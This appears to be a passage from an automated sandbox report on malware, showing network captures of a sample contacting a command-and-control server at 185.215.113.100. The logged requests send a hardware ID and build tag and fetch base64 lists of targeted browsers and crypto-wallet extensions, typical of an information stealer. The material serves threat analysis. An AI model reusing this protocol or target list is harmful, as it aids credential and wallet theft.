Sep 1, 2024 20:54:58.772186995 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.772221088 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.772248983 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.809403896 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.809459925 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.809487104 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.809499025 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.809530020 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.809540987 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.978140116 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.978164911 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.978212118 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.978256941 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.978317022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:58.978319883 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:58.978357077 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.016016006 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.016031027 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.016042948 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.016076088 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.016105890 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.061537981 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.061584949 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.061691046 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.061808109 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.206125021 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.206255913 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.206306934 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.249315023 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.249537945 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.249543905 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.249561071 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.249572039 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.249582052 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.249613047 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.332592010 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.332642078 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.332659006 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.332703114 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.465801001 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.465826988 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.465878010 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.465878010 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.753154039 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.753170967 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.753181934 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.753215075 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.753245115 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:59.753262997 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:59.753369093 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.014513969 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014558077 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014569998 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014611006 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.014719009 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014730930 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014766932 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.014903069 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.014981985 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.015026093 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.015218019 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.015260935 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.015264988 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:55:00.015304089 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:55:00.028062105 CEST	49704	80	192.168.2.5	185.215.113.100

HTTP Request Dependency Graph

185.215.113.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.100	80	3424	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 20:53:58.237189054 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 20:53:59.091248035 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:53:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 20:53:59.094611883 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGC Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--
Sep 1, 2024 20:53:59.416059971 CEST	407	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:53:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6d 51 78 4d 7a 45 31 4d 47 51 78 59 7a 5a 6a 4d 7a 55 32 4f 47 51 30 5a 6a 6c 6a 4e 57 49 7a 4e 32 52 6b 4f 47 56 6d 5a 6a 4e 6d 4e 6a 55 31 59 6d 59 33 5a 6d 59 34 4f 47 4a 6a 4f 44 4e 6a 4d 54 59 33 4d 44 4d 77 4f 54 64 68 4d 7a 51 77 4d 32 4e 6b 59 32 49 79 5a 6a 52 6c 4e 7a 64 6c 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MmQxMzE1MGQxYzZjMzU2OGQ0ZjljNWIzN2RkOGVmZjNmNjU1YmY3ZmY4OGJjODNjMTY3MDMwOTdhMzQwM2NkY2IyZjRlNzdlfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 1, 2024 20:53:59.418201923 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJK Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"browsers------BGCBGCAFIIECBFIDHIJK--
Sep 1, 2024 20:53:59.713977098 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:53:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 1, 2024 20:53:59.714000940 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 1, 2024 20:53:59.715400934 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="message"plugins------KFIIJJJDGCBAAKFIIECG--
Sep 1, 2024 20:54:00.006369114 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:53:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 1, 2024 20:54:00.006382942 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Sep 1, 2024 20:54:03.198895931 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
Sep 1, 2024 20:54:03.198987007 CEST	164	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6
Sep 1, 2024 20:54:03.398574114 CEST	1236	IN	Data Raw: 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 Data Ascii: Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB
Sep 1, 2024 20:54:03.398598909 CEST	1236	IN	Data Raw: 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d Data Ascii: Z25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ
Sep 1, 2024 20:54:03.398610115 CEST	328	IN	Data Raw: 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d Data Ascii: a3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFd
Sep 1, 2024 20:54:03.602771997 CEST	1236	IN	Data Raw: 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 Data Ascii: aWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamt
Sep 1, 2024 20:54:03.602945089 CEST	508	IN	Data Raw: 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 Data Ascii: fDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHx
Sep 1, 2024 20:54:03.634809017 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 